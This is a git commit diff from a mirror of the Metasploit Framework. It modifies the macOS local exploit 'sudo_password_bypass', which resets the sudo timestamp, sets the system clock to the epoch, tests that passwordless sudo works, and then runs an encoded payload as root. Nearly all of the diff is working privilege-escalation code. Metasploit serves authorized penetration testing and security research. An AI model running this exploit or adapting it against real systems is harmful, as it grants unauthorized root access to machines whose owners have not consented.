infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make a test before running the payload

bug/bundler_fix
jvazquez-r7 2013-08-24 11:20:47 -05:00
parent ab293d2ad9
commit 3ce23ffb49
1 changed files with 28 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
modules/exploits/osx/local/sudo_password_bypass.rb
View File

@ -160,14 +160,6 @@ class Metasploit3 < Msf::Exploit::Local
private private
def run_sudo_cmd def run_sudo_cmd
sudo_cmd_raw = if using_native_target?
['sudo', '-S', [drop_path].shelljoin].join(' ')
elsif using_cmd_target?
['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
end
## to prevent the password prompt from destroying session
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
print_status("Resetting user's time stamp file and setting clock to the epoch") print_status("Resetting user's time stamp file and setting clock to the epoch")
cmd_exec( cmd_exec(
@ -176,14 +168,37 @@ class Metasploit3 < Msf::Exploit::Local
" -setdate 01:01:1970 -settime 00:00" " -setdate 01:01:1970 -settime 00:00"
) )
# Run Test
test = rand_text_alpha(4 + rand(4))
sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')
print_status("Executing test...")
output = cmd_exec('echo "" | ' + sudo_cmd_test)
if output =~ /incorrect password attempts\s*$/i
fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")
elsif output =~ /#{test}/
print_good("Test executed succesfully. Running payload.")
else
print_error("Unknown fail while testing, trying to execute the payload anyway...")
end
# Run Payload
sudo_cmd_raw = if using_native_target?
['sudo', '-S', [drop_path].shelljoin].join(' ')
elsif using_cmd_target?
['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
end
## to prevent the password prompt from destroying session
## backgrounding the sudo payload in order to keep both sessions usable
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
print_status "Running command: " print_status "Running command: "
print_line sudo_cmd print_line sudo_cmd
output = cmd_exec(sudo_cmd) output = cmd_exec(sudo_cmd)
if output =~ /incorrect password attempts\s*$/i
fail_with(Exploit::Failure::NotFound,
"User has never run sudo, and is therefore not vulnerable. Bailing.")
end
#print_good output
end end
# cmd_exec doesn't allow to get a session, so there is no way to make the cleanup # cmd_exec doesn't allow to get a session, so there is no way to make the cleanup